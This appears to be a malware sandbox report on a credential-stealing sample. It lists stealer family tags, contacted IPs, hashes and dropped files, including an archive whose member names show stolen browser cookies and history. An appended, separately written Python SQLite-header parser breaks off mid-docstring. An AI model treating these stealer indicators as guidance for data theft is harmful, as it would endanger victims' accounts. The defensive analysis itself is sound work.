tvD0ERAvEn.exe | malicious | LummaC | 34.117.186.192, 172.67.75.166
yGn9saDnXX.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc | 34.117.186.192, 172.67.75.166
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192, 172.67.75.166
SecuriteInfo.com.Win32.Evo-gen.10308.24400.exe | malicious | LummaC | 34.117.186.192, 172.67.75.166

Match: 37f463bf4616ecd445d4a1937da06e19
YN9hIXWLJ3.exe | malicious | Unknown | 185.199.220.53
SecuriteInfo.com.FileRepMalware.16991.21545.exe | malicious | Unknown | 185.199.220.53
file.exe | malicious | PrivateLoader, Vidar | 185.199.220.53
Form_W-9_Ver-083_030913350-67084228u8857-460102.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 185.199.220.53
MSI.msi | malicious | Bazar Loader, BruteRatel, Latrodectus | 185.199.220.53
upfilles.dll.dll | malicious | Bazar Loader, BruteRatel, Latrodectus | 185.199.220.53
7Tat3LP3VY.msi | malicious | Unknown | 185.199.220.53
2R78NbtrsM.msi | malicious | Unknown | 185.199.220.53
europefridayedatingloverforchildern.jpg.vbs | malicious | AgentTesla | 185.199.220.53
file.exe | malicious | PrivateLoader, Vidar | 185.199.220.53

No context
Process: C:\Users\user\Desktop\file.exe
File Type: HTML document, ASCII text, with very long lines (24549), with CRLF, LF line terminators
Category: dropped
Size (bytes): 125695
Entropy (8bit): 5.351564791365279
Encrypted: false
SSDEEP: 3072:RrMQko++A8Rl4X18VKapiXufocoR0XY1ETuaI8G0rOnOU0VluaPIq/xMPgUl2yOE:vbLl4Xv
MD5: EF4C87982909D9829D446581B5AAC78D
SHA1: 9E1205153D0E9B919F71572D294B217107CD9DBD
SHA-256: 78E5C7A503EFEE6EDF595FB7EA8A841D4BD7B2FFE599A374C77DD04ABD6958E4
SHA-512: 324658C5E773D9F57A75EEDE3DCD062092F485A611A1FA7254FBCF0A928080D138566C7B9025636BAF3726DEF4BFE5AB70912B93004C8F96BC3653D9E0279A28
Malicious: true
Reputation: low
                                                                        Preview:<!DOCTYPE html>.<html lang="en-US">.<head>..<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<link rel="profile" href="http://gmpg.org/xfn/11" />..<link rel="pingback" href="https://easy2buy.ae/xmlrpc.php" />..<meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.0 - https://yoast.com/wordpress/plugins/seo/ -->..<title>Page not found - Easy2Buy</title>..<meta property="og:locale" content="en_US" />..<meta property="og:title" content="Page not found - Easy2Buy" />..<meta property="og:site_name" content="Easy2Buy" />..<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://easy2buy.ae/#website","url":"https://easy2buy.ae/","name":"Easy2Buy","description":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http
Process: C:\Users\user\Desktop\file.exe
File Type: HTML document, ASCII text, with very long lines (24549), with CRLF, LF line terminators
Category: dropped
Size (bytes): 125695
Entropy (8bit): 5.351564791365279
Encrypted: false
SSDEEP: 3072:RrMQko++A8Rl4X18VKapiXufocoR0XY1ETuaI8G0rOnOU0VluaPIq/xMPgUl2yOE:vbLl4Xv
MD5: EF4C87982909D9829D446581B5AAC78D
SHA1: 9E1205153D0E9B919F71572D294B217107CD9DBD
SHA-256: 78E5C7A503EFEE6EDF595FB7EA8A841D4BD7B2FFE599A374C77DD04ABD6958E4
SHA-512: 324658C5E773D9F57A75EEDE3DCD062092F485A611A1FA7254FBCF0A928080D138566C7B9025636BAF3726DEF4BFE5AB70912B93004C8F96BC3653D9E0279A28
Malicious: false
Reputation: low
                                                                        Preview:<!DOCTYPE html>.<html lang="en-US">.<head>..<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<link rel="profile" href="http://gmpg.org/xfn/11" />..<link rel="pingback" href="https://easy2buy.ae/xmlrpc.php" />..<meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.0 - https://yoast.com/wordpress/plugins/seo/ -->..<title>Page not found - Easy2Buy</title>..<meta property="og:locale" content="en_US" />..<meta property="og:title" content="Page not found - Easy2Buy" />..<meta property="og:site_name" content="Easy2Buy" />..<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://easy2buy.ae/#website","url":"https://easy2buy.ae/","name":"Easy2Buy","description":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http
Process: C:\Users\user\Desktop\file.exe
File Type: HTML document, ASCII text, with very long lines (24549), with CRLF, LF line terminators
Category: dropped
Size (bytes): 125695
Entropy (8bit): 5.351564791365279
Encrypted: false
SSDEEP: 3072:RrMQko++A8Rl4X18VKapiXufocoR0XY1ETuaI8G0rOnOU0VluaPIq/xMPgUl2yOE:vbLl4Xv
MD5: EF4C87982909D9829D446581B5AAC78D
SHA1: 9E1205153D0E9B919F71572D294B217107CD9DBD
SHA-256: 78E5C7A503EFEE6EDF595FB7EA8A841D4BD7B2FFE599A374C77DD04ABD6958E4
SHA-512: 324658C5E773D9F57A75EEDE3DCD062092F485A611A1FA7254FBCF0A928080D138566C7B9025636BAF3726DEF4BFE5AB70912B93004C8F96BC3653D9E0279A28
Malicious: false
Reputation: low
                                                                        Preview:<!DOCTYPE html>.<html lang="en-US">.<head>..<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<link rel="profile" href="http://gmpg.org/xfn/11" />..<link rel="pingback" href="https://easy2buy.ae/xmlrpc.php" />..<meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.0 - https://yoast.com/wordpress/plugins/seo/ -->..<title>Page not found - Easy2Buy</title>..<meta property="og:locale" content="en_US" />..<meta property="og:title" content="Page not found - Easy2Buy" />..<meta property="og:site_name" content="Easy2Buy" />..<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://easy2buy.ae/#website","url":"https://easy2buy.ae/","name":"Easy2Buy","description":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http
Process: C:\Users\user\Desktop\file.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 694849
Entropy (8bit): 7.997625432479841
Encrypted: true
SSDEEP: 12288:3JHOFvdaik7Gjk+SR5tKbpUzd4YbZlovdoBzmNYFA:38a9CK/tKbcd46ZlQdUSNYA
MD5: 4B64CCF687A4C8344E29847CB3693648
SHA1: 7B7014D8774EBC2E20C879C3FDA3404E7D0364E8
SHA-256: 7420B090ACE52CAB19BFB1C8AC57E56509BF9F6D83609507D734C10E019240AD
SHA-512: A4E5EA1A0E1E7EE027830B30E499024552F3CDA6B17CD876847DC0E7A7E864A1C6C6FD5A976820887E017F4E0D3C20D06D805CEC010A51DCB4D7828E7B42FC18
Malicious: true
Yara Hits:
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip, Author: Joe Security
Reputation: low
                                                                        Preview:PK zip archive; member names visible in the header: Cookies\Chrome_Default.txt, History\Firefox_v6zchhhv.default-release.txt, information.txt (compressed binary content omitted)
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):5242880
                                                                        Entropy (8bit):0.03859996294213402
                                                                        Encrypted:false
                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):155648
                                                                        Entropy (8bit):0.5407252242845243
                                                                        Encrypted:false
                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (24549), with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):125695
                                                                        Entropy (8bit):5.351564791365279
                                                                        Encrypted:false
                                                                        SSDEEP:3072:RrMQko++A8Rl4X18VKapiXufocoR0XY1ETuaI8G0rOnOU0VluaPIq/xMPgUl2yOE:vbLl4Xv
                                                                        MD5:EF4C87982909D9829D446581B5AAC78D
                                                                        SHA1:9E1205153D0E9B919F71572D294B217107CD9DBD
                                                                        SHA-256:78E5C7A503EFEE6EDF595FB7EA8A841D4BD7B2FFE599A374C77DD04ABD6958E4
                                                                        SHA-512:324658C5E773D9F57A75EEDE3DCD062092F485A611A1FA7254FBCF0A928080D138566C7B9025636BAF3726DEF4BFE5AB70912B93004C8F96BC3653D9E0279A28
                                                                        Malicious:false
                                                                        Preview:<!DOCTYPE html>.<html lang="en-US">.<head>..<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<link rel="profile" href="http://gmpg.org/xfn/11" />..<link rel="pingback" href="https://easy2buy.ae/xmlrpc.php" />..<meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.0 - https://yoast.com/wordpress/plugins/seo/ -->..<title>Page not found - Easy2Buy</title>..<meta property="og:locale" content="en_US" />..<meta property="og:title" content="Page not found - Easy2Buy" />..<meta property="og:site_name" content="Easy2Buy" />..<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://easy2buy.ae/#website","url":"https://easy2buy.ae/","name":"Easy2Buy","description":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):155648
                                                                        Entropy (8bit):0.5407252242845243
                                                                        Encrypted:false
                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):159744
                                                                        Entropy (8bit):0.5394293526345721
                                                                        Encrypted:false
                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):5242880
                                                                        Entropy (8bit):0.03859996294213402
                                                                        Encrypted:false
                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):159744
                                                                        Entropy (8bit):0.5394293526345721
                                                                        Encrypted:false
                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.6732424250451717
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.8439810553697228
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):51200
                                                                        Entropy (8bit):0.8746135976761988
                                                                        Encrypted:false
                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
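Added example, not part of the report and not PrivateLoader/RisePro code: a stdlib-only parser for the 100-byte SQLite header that recovers the fields the "File Type" lines of the dropped databases above report (page size, file change counter, page count, schema cookie, schema format, text encoding, version-valid-for, writing library version), plus a size consistency check. The header bytes are constructed by the block from the 196608-byte entry's values (page size 2048, file counter 8, 89 pages, cookie 0x36, schema 4, UTF-8, version 3042000), so it runs offline. The printable characters in the Preview lines are these same fields: "@" at offset 21 is the maximum embedded payload fraction (64), "Y" at offset 31 is the page count 89, and "6" at offset 43 is the low byte of cookie 0x36. The size check shows that entry's header (89 x 2048 = 182272 bytes) accounts for 7 fewer pages than the 196608-byte file holds; per the SQLite file format, the in-header page count is authoritative when the change counter equals version-valid-for, which it does here (8 = 8). Unlike the report's description, this one always prints the page size.

```python
import struct
from dataclasses import dataclass

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


@dataclass
class SQLiteHeader:
    page_size: int
    change_counter: int      # offset 24: file change counter
    pages: int               # offset 28: in-header database size in pages
    schema_cookie: int       # offset 40
    schema_format: int       # offset 44
    encoding: str            # offset 56
    version_valid_for: int   # offset 92
    sqlite_version: int      # offset 96: SQLITE_VERSION_NUMBER of the last writer

    def describe(self) -> str:
        """Same wording as the report's 'File Type' field."""
        return (f"SQLite 3.x database, last written using SQLite version {self.sqlite_version}, "
                f"page size {self.page_size}, file counter {self.change_counter}, "
                f"database pages {self.pages}, cookie {self.schema_cookie:#x}, "
                f"schema {self.schema_format}, {self.encoding}, "
                f"version-valid-for {self.version_valid_for}")

    def header_size_is_valid(self) -> bool:
        """The in-header page count is authoritative only if non-zero and the
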